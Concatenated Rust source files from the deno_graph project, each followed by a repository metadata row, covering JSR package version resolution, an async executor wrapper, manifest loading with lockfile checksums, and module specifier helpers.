  /// The file's checksum.
  pub checksum: String,
}
/// Metadata for a specific published JSR package version: its exports,
/// serialized module graph, and file manifest.
#[derive(Debug, Serialize, Deserialize, Clone, Default)]
pub struct JsrPackageVersionInfo {
  // ensure the fields on here are resilient to change
  #[serde(default)]
  pub exports: serde_json::Value,
  /// The v1 serialized module graph, if present.
  #[serde(rename = "moduleGraph1")]
  pub module_graph_1: Option<serde_json::Value>,
  /// The v2 serialized module graph, if present (preferred over v1).
  #[serde(rename = "moduleGraph2")]
  pub module_graph_2: Option<serde_json::Value>,
  /// Map of file path to its manifest entry.
  pub manifest: HashMap<String, JsrPackageVersionManifestEntry>,
  /// This is a property that deno_cache_dir sets when copying from
  /// the global to the local cache. If it's set, put this in the lockfile
  /// instead of computing the checksum from the file bytes. This is necessary
  /// because we store less data in the metadata files found in the vendor
  /// directory than in the global cache and also someone may modify the vendored
  /// files then regenerate the lockfile.
  #[serde(rename = "lockfileChecksum")]
  pub lockfile_checksum: Option<String>,
}
impl JsrPackageVersionInfo {
  /// Resolves the provided export key.
  ///
  /// Note: This assumes the provided export name is normalized.
  pub fn export(&self, export_name: &str) -> Option<&str> {
    match &self.exports {
      // a bare string only answers the "." export
      serde_json::Value::String(value) => {
        (export_name == ".").then_some(value.as_str())
      }
      serde_json::Value::Object(map) => {
        map.get(export_name).and_then(|value| value.as_str())
      }
      _ => None,
    }
  }

  /// Gets the key and values of the exports map.
  pub fn exports(&self) -> Box<dyn Iterator<Item = (&str, &str)> + '_> {
    match &self.exports {
      serde_json::Value::String(value) => {
        Box::new(std::iter::once((".", value.as_str())))
      }
      serde_json::Value::Object(map) => Box::new(
        // non-string values are silently skipped
        map
          .iter()
          .filter_map(|(key, value)| Some((key.as_str(), value.as_str()?))),
      ),
      _ => Box::new(std::iter::empty()),
    }
  }

  /// Deserializes the pre-analyzed module info for `specifier` from the
  /// version's serialized module graph, preferring the v2 format and
  /// converting the v1 format when only that is present.
  pub fn module_info(&self, specifier: &str) -> Option<ModuleInfo> {
    if let Some(module_graph) = self.module_graph_2.as_ref() {
      let module_info = module_graph.as_object()?.get(specifier)?;
      serde_json::from_value(module_info.clone()).ok()
    } else if let Some(module_graph) = self.module_graph_1.as_ref() {
      let mut module_info = module_graph.as_object()?.get(specifier)?.clone();
      module_graph_1_to_2(&mut module_info);
      serde_json::from_value(module_info).ok()
    } else {
      None
    }
  }
}
/// Bookkeeping about how a resolved package version is used in the graph.
#[derive(Debug, Clone)]
struct PackageNvInfo {
  /// Collection of exports used.
  exports: BTreeMap<String, String>,
  /// Dependency constraints found in this package's modules.
  found_dependencies: HashSet<JsrDepPackageReq>,
}
/// Tracks JSR package requirements found in the graph and the versions
/// they resolved to.
#[derive(Debug, Clone, Default, Serialize)]
pub struct PackageSpecifiers {
  /// Mapping from requirement to resolved version (the only serialized field).
  #[serde(flatten)]
  package_reqs: BTreeMap<PackageReq, PackageNv>,
  /// Resolved versions grouped by package name.
  #[serde(skip_serializing)]
  packages_by_name: HashMap<StackString, Vec<PackageNv>>,
  /// Per-version usage info (exports and dependencies).
  #[serde(skip_serializing)]
  packages: BTreeMap<PackageNv, PackageNvInfo>,
  /// Cache for packages that have a referrer outside JSR.
  #[serde(skip_serializing)]
  top_level_packages: BTreeSet<PackageNv>,
  /// Yanked package versions that were nevertheless used.
  #[serde(skip_serializing)]
  used_yanked_packages: BTreeSet<PackageNv>,
}
impl PackageSpecifiers {
  /// Returns `true` when no package requirements have been resolved.
  pub fn is_empty(&self) -> bool {
    self.package_reqs.is_empty()
  }

  /// The total number of JSR packages found in the graph.
  pub fn packages_len(&self) -> usize {
    self.packages.len()
  }

  /// The total number of dependencies of jsr packages found in the graph.
  pub fn package_deps_sum(&self) -> usize {
    self
      .packages
      .values()
      .map(|info| info.found_dependencies.len())
      .sum()
  }

  /// Records that `package_req` resolved to the version `nv`.
  pub fn add_nv(&mut self, package_req: PackageReq, nv: PackageNv) {
    let nvs = self
      .packages_by_name
      .entry(package_req.name.clone())
      .or_default();
    // keep the per-name version list free of duplicates
    if !nvs.contains(&nv) {
      nvs.push(nv.clone());
    }
    self.package_reqs.insert(package_req, nv.clone());
  }

  /// Ensures bookkeeping exists for `nv` so that dependencies and exports
  /// can later be recorded against it.
  pub(crate) fn ensure_package(&mut self, nv: PackageNv) {
    self.packages.entry(nv).or_insert_with(|| PackageNvInfo {
      exports: Default::default(),
      found_dependencies: Default::default(),
    });
  }

  /// Gets the dependencies (package constraints) of JSR packages found in the graph.
  pub fn packages_with_deps(
    &self,
  ) -> impl Iterator<Item = (&PackageNv, impl Iterator<Item = &JsrDepPackageReq>)>
  {
    self.packages.iter().map(|(nv, info)| {
      let deps = info.found_dependencies.iter();
      (nv, deps)
    })
  }

  /// Records a dependency constraint found in package `nv`.
  ///
  /// # Panics
  ///
  /// Panics when `nv` was not previously registered via `ensure_package`.
  pub(crate) fn add_dependency(
    &mut self,
    nv: &PackageNv,
    dep: JsrDepPackageReq,
  ) {
    self
      .packages
      .get_mut(nv)
      .expect("ensure_package must be called before add_dependency")
      .found_dependencies
      .insert(dep);
  }

  /// Records an export (name, path) used from package `nv`.
  ///
  /// # Panics
  ///
  /// Panics when `nv` was not previously registered via `ensure_package`.
  pub(crate) fn add_export(
    &mut self,
    nv: &PackageNv,
    export: (String, String),
  ) {
    self
      .packages
      .get_mut(nv)
      .expect("ensure_package must be called before add_export")
      .exports
      .insert(export.0, export.1);
  }

  /// Marks `nv` as having a referrer outside JSR.
  pub(crate) fn add_top_level_package(&mut self, nv: PackageNv) {
    self.top_level_packages.insert(nv);
  }

  /// Packages that have a referrer outside JSR.
  pub(crate) fn top_level_packages(&self) -> &BTreeSet<PackageNv> {
    &self.top_level_packages
  }

  /// Records that a yanked package version was used in the graph.
  pub(crate) fn add_used_yanked_package(&mut self, nv: PackageNv) {
    self.used_yanked_packages.insert(nv);
  }

  /// Iterates the yanked package versions that were used in the graph.
  // NOTE(review): this only reads state, so `&self` would suffice; the
  // `&mut self` receiver is kept to avoid changing the public API here.
  pub fn used_yanked_packages(&mut self) -> impl Iterator<Item = &PackageNv> {
    self.used_yanked_packages.iter()
  }

  /// The exports used from package `nv`, if it was seen in the graph.
  pub fn package_exports(
    &self,
    nv: &PackageNv,
  ) -> Option<&BTreeMap<String, String>> {
    self.packages.get(nv).map(|p| &p.exports)
  }

  /// All resolved versions for the package named `name`.
  pub fn versions_by_name(&self, name: &str) -> Option<&Vec<PackageNv>> {
    self.packages_by_name.get(name)
  }

  /// Mapping of package requirement to the version it resolved to.
  pub fn mappings(&self) -> &BTreeMap<PackageReq, PackageNv> {
    &self.package_reqs
  }
}
/// The result of resolving a version requirement against package info.
pub struct JsrVersionResolverResolvedVersion<'a> {
  /// Whether the resolved version is yanked.
  pub is_yanked: bool,
  /// The resolved version.
  pub version: &'a Version,
}
/// Resolves JSR package versions, honoring any configured
/// newest-dependency-date options.
#[derive(Debug, Default, Clone)]
pub struct JsrVersionResolver {
  pub newest_dependency_date_options: NewestDependencyDateOptions,
}
impl JsrVersionResolver {
  /// Builds a resolver for a single package, capturing that package's
  /// cutoff date (if any) alongside its registry manifest.
  pub fn get_for_package<'a>(
    &'a self,
    package_name: &PackageName,
    package_info: &'a JsrPackageInfo,
  ) -> JsrPackageVersionResolver<'a> {
    let newest_dependency_date = self
      .newest_dependency_date_options
      .get_for_package(package_name);
    JsrPackageVersionResolver {
      package_info,
      newest_dependency_date,
    }
  }
}
/// Resolves versions for a single JSR package using its registry manifest.
pub struct JsrPackageVersionResolver<'a> {
  package_info: &'a JsrPackageInfo,
  // Cutoff date (if any) that newly selected versions must not exceed.
  newest_dependency_date: Option<NewestDependencyDate>,
}
impl<'a> JsrPackageVersionResolver<'a> {
  /// The registry manifest this resolver reads from.
  pub fn info(&self) -> &'a JsrPackageInfo {
    self.package_info
  }
  /// Resolves `package_req` to a version, preferring (in order): versions
  /// already in use in the graph, unyanked registry versions, then yanked
  /// registry versions.
  pub fn resolve_version<'b>(
    &'b self,
    package_req: &PackageReq,
    existing_versions: impl Iterator<Item = &'b Version>,
  ) -> Result<JsrVersionResolverResolvedVersion<'b>, JsrPackageReqNotFoundError>
  {
    // 1. try to resolve with the list of existing versions
    if let ResolveVersionResult::Some(version) = resolve_version(
      ResolveVersionOptions {
        version_req: &package_req.version_req,
        // don't use this here because existing versions are ok to resolve to
        newest_dependency_date: None,
      },
      existing_versions.map(|v| (v, None)),
    ) {
      // an existing version may still be yanked in the registry; report that
      let is_yanked = self
        .package_info
        .versions
        .get(version)
        .map(|i| i.yanked)
        .unwrap_or(false);
      return Ok(JsrVersionResolverResolvedVersion { is_yanked, version });
    }
    // 2. attempt to resolve with the unyanked versions
    let mut any_had_higher_newest_dep_date_version = false;
    let unyanked_versions = self
      .package_info
      .versions
      .iter()
      .filter_map(|(v, i)| if !i.yanked { Some((v, Some(i))) } else { None });
    match resolve_version(
      ResolveVersionOptions {
        version_req: &package_req.version_req,
        newest_dependency_date: self.newest_dependency_date,
      },
      unyanked_versions,
    ) {
      ResolveVersionResult::Some(version) => {
        return Ok(JsrVersionResolverResolvedVersion {
          is_yanked: false,
          version,
        });
      }
      ResolveVersionResult::None {
        had_higher_date_version,
      } => {
        any_had_higher_newest_dep_date_version |= had_higher_date_version;
      }
    }
    // 3. attempt to resolve with the yanked versions
    let yanked_versions = self
      .package_info
      .versions
      .iter()
      .filter_map(|(v, i)| if i.yanked { Some((v, Some(i))) } else { None });
    match resolve_version(
      ResolveVersionOptions {
        version_req: &package_req.version_req,
        newest_dependency_date: self.newest_dependency_date,
      },
      yanked_versions,
    ) {
      ResolveVersionResult::Some(version) => {
        return Ok(JsrVersionResolverResolvedVersion {
          is_yanked: true,
          version,
        });
      }
      ResolveVersionResult::None {
        had_higher_date_version,
      } => {
        any_had_higher_newest_dep_date_version |= had_higher_date_version;
      }
    }
    // nothing matched; include the cutoff date in the error only when a
    // matching version existed but was excluded by it
    Err(JsrPackageReqNotFoundError {
      req: package_req.clone(),
      newest_dependency_date: any_had_higher_newest_dep_date_version
        .then_some(self.newest_dependency_date)
        .flatten(),
    })
  }
  /// Whether `version_info` satisfies the configured cutoff date
  /// (`true` when no cutoff is configured).
  pub fn matches_newest_dependency_date(
    &self,
    version_info: &JsrPackageInfoVersion,
  ) -> bool {
    match self.newest_dependency_date {
      Some(newest_dependency_date) => {
        version_info.matches_newest_dependency_date(newest_dependency_date)
      }
      None => true,
    }
  }
}
/// Inputs to [`resolve_version`].
pub struct ResolveVersionOptions<'a> {
  pub version_req: &'a VersionReq,
  /// When set, only versions satisfying this date cutoff may be selected.
  pub newest_dependency_date: Option<NewestDependencyDate>,
}
/// Result of attempting to select a version for a version requirement.
pub enum ResolveVersionResult<'a> {
  Some(&'a Version),
  /// No version selected; `had_higher_date_version` is `true` when at least
  /// one version matched the requirement but was excluded by the date cutoff.
  None { had_higher_date_version: bool },
}
/// Selects the highest version from `versions` that satisfies the version
/// requirement, honoring the optional newest-dependency-date cutoff.
pub fn resolve_version<'a>(
  options: ResolveVersionOptions<'_>,
  versions: impl Iterator<Item = (&'a Version, Option<&'a JsrPackageInfoVersion>)>,
) -> ResolveVersionResult<'a> {
  let mut maybe_best_version: Option<&Version> = None;
  // Set whenever a version matches the requirement; only meaningful in the
  // `None` result, where it implies every match was excluded by the cutoff.
  let mut had_higher_date_version = false;
  for (version, version_info) in versions {
    if options.version_req.matches(version) {
      had_higher_date_version = true;
      if matches_newest_dependency_date(
        version_info,
        options.newest_dependency_date,
      ) {
        // keep the maximum matching version
        let is_best_version = maybe_best_version
          .as_ref()
          .map(|best_version| (*best_version).cmp(version).is_lt())
          .unwrap_or(true);
        if is_best_version {
          maybe_best_version = Some(version);
        }
      }
    }
  }
  match maybe_best_version {
    Some(version) => ResolveVersionResult::Some(version),
    None => ResolveVersionResult::None {
      had_higher_date_version,
    },
  }
}
/// Whether `info` satisfies the optional date cutoff.
///
/// Returns `true` when there is no version info or no cutoff configured.
/// (Rewritten as a tuple match; the previous `info.as_ref()` on an
/// `Option<&T>` was a redundant double-reference — clippy `useless_asref`.)
fn matches_newest_dependency_date(
  info: Option<&JsrPackageInfoVersion>,
  newest_dependency_date: Option<NewestDependencyDate>,
) -> bool {
  match (info, newest_dependency_date) {
    (Some(info), Some(date)) => info.matches_newest_dependency_date(date),
    _ => true,
  }
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/rt.rs | src/rt.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use futures::channel::oneshot;
use std::future::Future;
use std::pin::Pin;
use std::task::Context;
use std::task::Poll;
/// A non-`Send` boxed future with no output, as handed to an [`Executor`].
pub type BoxedFuture = Pin<Box<dyn Future<Output = ()> + 'static>>;
/// An executor for futures.
///
/// This trait allows deno_graph to run background tasks on
/// the async executor.
pub trait Executor {
  /// Spawns a future to run on this executor.
  ///
  /// The returned future resolves once the spawned work completes.
  fn execute(&self, fut: BoxedFuture) -> BoxedFuture;
}
impl<'a> Default for &'a dyn Executor {
  fn default() -> &'a dyn Executor {
    {
      // Fallback executor used when the caller does not supply one.
      struct DefaultExecutor;
      impl Executor for DefaultExecutor {
        fn execute(&self, future: BoxedFuture) -> BoxedFuture {
          // On Wasm the future is returned as-is and driven by whoever
          // awaits it.
          #[cfg(target_arch = "wasm32")]
          return future;
          #[cfg(not(target_arch = "wasm32"))]
          {
            use futures::FutureExt;
            // Spawn on the current-thread runtime; the `unwrap` propagates
            // a panic from the spawned task to the awaiting caller.
            deno_unsync::spawn(future).map(|v| v.unwrap()).boxed_local()
          }
        }
      }
      &DefaultExecutor
    }
  }
}
/// Handle to a task started via [`spawn`]; resolves to the task's output.
pub(crate) struct JoinHandle<T> {
  // Receives the task's result once it completes.
  rx: oneshot::Receiver<T>,
  // The executor-wrapped future that drives the task to completion.
  fut: BoxedFuture,
}
impl<T> Future for JoinHandle<T> {
  type Output = T;
  fn poll(mut self: Pin<&mut Self>, cx: &mut Context) -> Poll<Self::Output> {
    // Drive the spawned task first; once it completes, its result must
    // already have been sent on the channel.
    if let Poll::Ready(()) = Pin::new(&mut self.fut).poll(cx) {
      match Pin::new(&mut self.rx).poll(cx) {
        Poll::Ready(Ok(res)) => Poll::Ready(res),
        _ => {
          // The sender was dropped without sending a value, which only
          // happens when the task did not run to completion (e.g. panicked).
          panic!("task panic");
        }
      }
    } else {
      Poll::Pending
    }
  }
}
/// Runs `f` on the given executor, returning a handle that resolves to
/// the future's output.
pub(crate) fn spawn<F, T: 'static>(
  executor: &dyn Executor,
  f: F,
) -> JoinHandle<T>
where
  F: Future<Output = T> + 'static,
{
  let (sender, receiver) = oneshot::channel();
  let wrapped = Box::pin(async move {
    // Ignore a send failure: it just means the handle was dropped.
    let _ = sender.send(f.await);
  });
  JoinHandle {
    rx: receiver,
    fut: executor.execute(wrapped),
  }
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/collections.rs | src/collections.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use indexmap::IndexSet;
/// Collection useful for a phased pass where the pending items
/// are the same values as the seen items.
pub struct SeenPendingCollection<T: std::hash::Hash + Eq + Clone> {
  // Insertion-ordered set of every item ever added.
  inner: IndexSet<T>,
  // Index of the next item to hand out from `next_pending`.
  next_index: usize,
}
impl<T: std::hash::Hash + Eq + Clone> SeenPendingCollection<T> {
  /// Creates an empty collection pre-sized for `capacity` items.
  pub fn with_capacity(capacity: usize) -> Self {
    Self {
      inner: IndexSet::with_capacity(capacity),
      next_index: 0,
    }
  }

  /// Returns `true` if `item` was ever added.
  pub fn has_seen(&self, item: &T) -> bool {
    self.inner.contains(item)
  }

  /// Adds `item`, returning `true` when it was not already present.
  pub fn add(&mut self, item: T) -> bool {
    self.inner.insert(item)
  }

  /// Adds every item yielded by `items`.
  pub fn extend(&mut self, items: impl Iterator<Item = T>) {
    self.inner.extend(items)
  }

  /// Returns the next not-yet-visited item, advancing the cursor.
  pub fn next_pending(&mut self) -> Option<T> {
    let item = self.inner.get_index(self.next_index)?.clone();
    self.next_index += 1;
    Some(item)
  }
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/module_specifier.rs | src/module_specifier.rs | // Copyright 2018-2024 the Deno authors. MIT license.
/// A resolved module specifier (an absolute URL).
pub type ModuleSpecifier = url::Url;
pub use import_map::specifier::SpecifierError;
pub use import_map::specifier::resolve_import;
/// Returns whether `url` points at a file-system root: `file:///`,
/// the bare `file://`, or a Windows drive root like `file:///C:/`.
pub fn is_fs_root_specifier(url: &ModuleSpecifier) -> bool {
  if url.scheme() != "file" {
    return false;
  }
  // Strip surrounding slashes so `/C:/` and `C:` compare the same.
  let path = url.path().trim_start_matches('/').trim_end_matches('/');
  let mut segments = path.split('/');
  let first = match segments.next() {
    Some(segment) => segment,
    None => return true,
  };
  // More than one path segment means it's not a root.
  if segments.next().is_some() {
    return false;
  }
  // Empty path (e.g. `file:///`) is a unix-style root.
  if first.is_empty() {
    return true;
  }
  // Windows drive root: exactly an ASCII letter followed by a colon.
  let bytes = first.as_bytes();
  bytes.len() == 2 && bytes[0].is_ascii_alphabetic() && bytes[1] == b':'
}
#[cfg(test)]
mod test {
  use crate::ModuleSpecifier;
  use super::*;
  #[test]
  fn test_is_fs_root_specifier() {
    // (specifier, expected) pairs covering non-file schemes, unix roots,
    // the bare authority form, Windows drive roots, and non-root paths.
    let cases = [
      ("https://deno.land", false),
      ("file:///", true),
      ("file://", true),
      ("file:///C:/", true),
      ("file:///V:/", true),
      ("file:///V:/test/", false),
    ];
    for (specifier, expected) in cases {
      let url = ModuleSpecifier::parse(specifier).unwrap();
      assert_eq!(is_fs_root_specifier(&url), expected, "{:?}", specifier);
    }
  }
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/jsr.rs | src/jsr.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::cell::RefCell;
use std::collections::HashMap;
use std::sync::Arc;
use deno_semver::package::PackageNv;
use deno_unsync::future::LocalFutureExt;
use deno_unsync::future::SharedLocal;
use futures::FutureExt;
use crate::Executor;
use crate::ModuleSpecifier;
use crate::graph::JsrLoadError;
use crate::packages::JsrPackageInfo;
use crate::packages::JsrPackageVersionInfo;
use crate::rt::JoinHandle;
use crate::rt::spawn;
use crate::source::CacheSetting;
use crate::source::JsrUrlProvider;
use crate::source::LoadError;
use crate::source::LoadOptions;
use crate::source::LoadResponse;
use crate::source::Loader;
use crate::source::LoaderChecksum;
use crate::source::Locker;
/// A loaded package version manifest plus the checksum to record for it.
#[derive(Debug, Clone)]
pub struct PendingJsrPackageVersionInfoLoadItem {
  /// Checksum to write to the lockfile when one wasn't already pinned.
  pub checksum_for_locker: Option<LoaderChecksum>,
  pub info: Arc<JsrPackageVersionInfo>,
}
/// A shared in-flight load whose result can be awaited by multiple callers.
pub type PendingResult<T> = SharedLocal<JoinHandle<Result<T, JsrLoadError>>>;
/// Services [`JsrMetadataStore`] needs to kick off metadata loads.
#[derive(Clone, Copy)]
pub struct JsrMetadataStoreServices<'a> {
  pub loader: &'a dyn Loader,
  pub executor: &'a dyn Executor,
  pub jsr_url_provider: &'a dyn JsrUrlProvider,
}
/// Caches in-flight and completed loads of JSR package and package-version
/// manifests so each manifest is fetched at most once.
#[derive(Debug, Default)]
pub struct JsrMetadataStore {
  // Keyed by package name -> pending `meta.json` load.
  pending_package_info_loads:
    RefCell<HashMap<String, PendingResult<Arc<JsrPackageInfo>>>>,
  // Keyed by package name+version -> pending `<version>_meta.json` load.
  pending_package_version_info_loads: RefCell<
    HashMap<PackageNv, PendingResult<PendingJsrPackageVersionInfoLoadItem>>,
  >,
}
impl JsrMetadataStore {
  /// Gets the pending/completed load of a package's `meta.json`, if queued.
  pub(crate) fn get_package_metadata(
    &self,
    package_name: &str,
  ) -> Option<PendingResult<Arc<JsrPackageInfo>>> {
    self
      .pending_package_info_loads
      .borrow()
      .get(package_name)
      .cloned()
  }
  /// Drops a queued package manifest load so it can be re-queued later.
  pub(crate) fn remove_package_metadata(&self, package_name: &str) {
    self
      .pending_package_info_loads
      .borrow_mut()
      .remove(package_name);
  }
  /// Gets the pending/completed load of a package version's manifest,
  /// if queued.
  pub(crate) fn get_package_version_metadata(
    &self,
    nv: &PackageNv,
  ) -> Option<PendingResult<PendingJsrPackageVersionInfoLoadItem>> {
    self
      .pending_package_version_info_loads
      .borrow()
      .get(nv)
      .cloned()
  }
  /// Queues a load of the package manifest (`<name>/meta.json`).
  /// Does nothing if a load for the package is already queued.
  pub(crate) fn queue_load_package_info(
    &self,
    package_name: &str,
    cache_setting: CacheSetting,
    services: JsrMetadataStoreServices,
  ) {
    let mut loads = self.pending_package_info_loads.borrow_mut();
    if loads.contains_key(package_name) {
      return; // already queued
    }
    // request to load
    let specifier = services
      .jsr_url_provider
      .url()
      .join(&format!("{}/meta.json", package_name))
      .unwrap();
    let fut = self.load_data(
      specifier,
      services,
      cache_setting,
      /* checksum */ None,
      |content| {
        let package_info: JsrPackageInfo = serde_json::from_slice(content)?;
        Ok(Arc::new(package_info))
      },
      {
        let package_name = package_name.to_string();
        |e| JsrLoadError::PackageManifestLoad(package_name, Arc::new(e))
      },
      {
        let package_name = package_name.to_string();
        || JsrLoadError::PackageNotFound(package_name)
      },
    );
    loads.insert(package_name.to_string(), fut);
  }
  /// Queues a load of a package version's manifest
  /// (`<name>/<version>_meta.json`), verifying it against the lockfile
  /// checksum when one exists. Does nothing if already queued.
  pub(crate) fn queue_load_package_version_info(
    &self,
    package_nv: &PackageNv,
    cache_setting: CacheSetting,
    maybe_locker: Option<&dyn Locker>,
    services: JsrMetadataStoreServices,
  ) {
    let mut loads = self.pending_package_version_info_loads.borrow_mut();
    if loads.contains_key(package_nv) {
      return; // already queued
    }
    let specifier = services
      .jsr_url_provider
      .url()
      .join(&format!(
        "{}/{}_meta.json",
        package_nv.name, package_nv.version
      ))
      .unwrap();
    let maybe_expected_checksum = maybe_locker
      .as_ref()
      .and_then(|locker| locker.get_pkg_manifest_checksum(package_nv));
    // when a locker exists but has no pinned checksum yet, compute one
    // from the loaded content so it can be recorded
    let should_compute_checksum =
      maybe_expected_checksum.is_none() && maybe_locker.is_some();
    let fut = self.load_data(
      specifier,
      services,
      cache_setting,
      // we won't have a checksum when not using a lockfile
      maybe_expected_checksum,
      move |content| {
        let version_info: JsrPackageVersionInfo =
          serde_json::from_slice(content)?;
        let checksum_for_locker = should_compute_checksum.then(|| {
          LoaderChecksum::new(
            version_info
              .lockfile_checksum
              .clone()
              .unwrap_or_else(|| LoaderChecksum::r#gen(content)),
          )
        });
        Ok(PendingJsrPackageVersionInfoLoadItem {
          checksum_for_locker,
          info: Arc::new(version_info),
        })
      },
      {
        let package_nv = package_nv.clone();
        |e| {
          match e {
            LoadError::ChecksumIntegrity(err) => {
              // use a more specific variant in order to allow the
              // cli to enhance this error message
              JsrLoadError::PackageVersionManifestChecksumIntegrity(
                Box::new(package_nv),
                err,
              )
            }
            LoadError::Other(err) => JsrLoadError::PackageVersionManifestLoad(
              Box::new(package_nv),
              err,
            ),
          }
        }
      },
      {
        let package_nv = package_nv.clone();
        || JsrLoadError::PackageVersionNotFound(Box::new(package_nv))
      },
    );
    loads.insert(package_nv.clone(), fut);
  }
  /// Starts a load of `specifier` on the executor and returns a shareable
  /// future for its parsed result. `handle_content` parses the bytes;
  /// the two error factories map load failures and not-found responses.
  #[allow(clippy::too_many_arguments)]
  fn load_data<T: Clone + 'static>(
    &self,
    specifier: ModuleSpecifier,
    services: JsrMetadataStoreServices,
    cache_setting: CacheSetting,
    maybe_expected_checksum: Option<LoaderChecksum>,
    handle_content: impl FnOnce(&[u8]) -> Result<T, serde_json::Error> + 'static,
    create_failed_load_err: impl FnOnce(LoadError) -> JsrLoadError + 'static,
    create_not_found_error: impl FnOnce() -> JsrLoadError + 'static,
  ) -> PendingResult<T> {
    let fut = services.loader.load(
      &specifier,
      LoadOptions {
        in_dynamic_branch: false,
        was_dynamic_root: false,
        cache_setting,
        maybe_checksum: maybe_expected_checksum,
      },
    );
    let fut = spawn(
      services.executor,
      async move {
        let data = match fut.await {
          Ok(data) => data,
          Err(err) => return Err(create_failed_load_err(err)),
        };
        match data {
          Some(LoadResponse::Module { content, .. }) => {
            handle_content(&content).map_err(|e| {
              create_failed_load_err(LoadError::Other(Arc::new(e)))
            })
          }
          Some(LoadResponse::Redirect { specifier }) => {
            Err(JsrLoadError::RedirectInPackage(specifier))
          }
          _ => Err(create_not_found_error()),
        }
      }
      .boxed_local(),
    );
    fut.shared_local()
  }
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/graph.rs | src/graph.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use crate::ReferrerImports;
use crate::analysis::DependencyDescriptor;
use crate::analysis::DynamicArgument;
use crate::analysis::DynamicDependencyKind;
use crate::analysis::DynamicTemplatePart;
use crate::analysis::ImportAttributes;
use crate::analysis::ModuleAnalyzer;
use crate::analysis::ModuleInfo;
use crate::analysis::SpecifierWithRange;
use crate::analysis::StaticDependencyKind;
use crate::analysis::TypeScriptReference;
use crate::analysis::TypeScriptTypesResolutionMode;
use crate::collections::SeenPendingCollection;
use crate::jsr::JsrMetadataStore;
use crate::jsr::JsrMetadataStoreServices;
use crate::jsr::PendingJsrPackageVersionInfoLoadItem;
use crate::jsr::PendingResult;
use crate::packages::JsrVersionResolver;
use crate::packages::NewestDependencyDate;
use crate::module_specifier::ModuleSpecifier;
use crate::module_specifier::SpecifierError;
use crate::module_specifier::is_fs_root_specifier;
use crate::module_specifier::resolve_import;
use crate::packages::JsrPackageInfo;
use crate::packages::JsrPackageVersionInfo;
use crate::packages::PackageSpecifiers;
use crate::rt::Executor;
use crate::source::*;
use crate::MediaType;
use boxed_error::Boxed;
use deno_error::JsError;
use deno_error::JsErrorBox;
use deno_error::JsErrorClass;
use deno_media_type::encoding::BOM_CHAR;
use deno_media_type::encoding::DecodedArcSourceDetailKind;
use deno_semver::RangeSetOrTag;
use deno_semver::SmallStackString;
use deno_semver::StackString;
use deno_semver::Version;
use deno_semver::VersionReq;
use deno_semver::jsr::JsrDepPackageReq;
use deno_semver::jsr::JsrPackageNvReference;
use deno_semver::jsr::JsrPackageReqReference;
use deno_semver::npm::NpmPackageNvReference;
use deno_semver::npm::NpmPackageReqReference;
use deno_semver::package::PackageNv;
use deno_semver::package::PackageNvReference;
use deno_semver::package::PackageReq;
use deno_semver::package::PackageReqReferenceParseError;
use deno_semver::package::PackageSubPath;
use futures::FutureExt;
use futures::future::LocalBoxFuture;
use futures::stream::FuturesOrdered;
use futures::stream::FuturesUnordered;
use futures::stream::StreamExt;
use indexmap::IndexMap;
use indexmap::IndexSet;
use serde::Deserialize;
use serde::Serialize;
use serde::Serializer;
use serde::ser::SerializeSeq;
use serde::ser::SerializeStruct;
use serde::ser::SerializeTuple;
use std::borrow::Cow;
use std::cell::RefCell;
use std::cmp::Ordering;
use std::collections::BTreeMap;
use std::collections::BTreeSet;
use std::collections::HashMap;
use std::collections::HashSet;
use std::collections::VecDeque;
use std::fmt;
use std::path::Path;
use std::rc::Rc;
use std::sync::Arc;
use std::time::SystemTime;
use sys_traits::FileType;
use sys_traits::FsDirEntry;
use thiserror::Error;
use url::Url;
use wasm::wasm_module_to_dts;
/// A 0-indexed line and character position within a source file.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize, Hash)]
pub struct Position {
  /// The 0-indexed line index.
  pub line: usize,
  /// The 0-indexed character index.
  pub character: usize,
}
impl std::fmt::Display for Position {
  fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
    // Render 1-indexed `line:character` for human-facing output.
    let line = self.line + 1;
    let character = self.character + 1;
    write!(f, "{line}:{character}")
  }
}
impl PartialOrd for Position {
  fn partial_cmp(&self, other: &Self) -> Option<Ordering> {
    // Delegate to the total order defined by `Ord`.
    Some(self.cmp(other))
  }
}
impl Ord for Position {
  fn cmp(&self, other: &Self) -> Ordering {
    // Order by line first, then by character within the same line.
    self
      .line
      .cmp(&other.line)
      .then_with(|| self.character.cmp(&other.character))
  }
}
impl Position {
  /// Creates a position from 0-indexed line and character indexes.
  pub fn new(line: usize, character: usize) -> Self {
    Self { line, character }
  }
  /// The position at the very start of a file (line 0, character 0).
  pub fn zeroed() -> Self {
    Self {
      line: 0,
      character: 0,
    }
  }
  /// Converts a swc source position into a line/character position.
  #[cfg(feature = "swc")]
  pub fn from_source_pos(
    pos: deno_ast::SourcePos,
    text_info: &deno_ast::SourceTextInfo,
  ) -> Self {
    let line_and_column_index = text_info.line_and_column_index(pos);
    Self {
      line: line_and_column_index.line_index,
      character: line_and_column_index.column_index,
    }
  }
  /// Converts this line/character position back into a swc source position.
  #[cfg(feature = "swc")]
  pub fn as_source_pos(
    &self,
    text_info: &deno_ast::SourceTextInfo,
  ) -> deno_ast::SourcePos {
    text_info.loc_to_source_pos(deno_ast::LineAndColumnIndex {
      line_index: self.line,
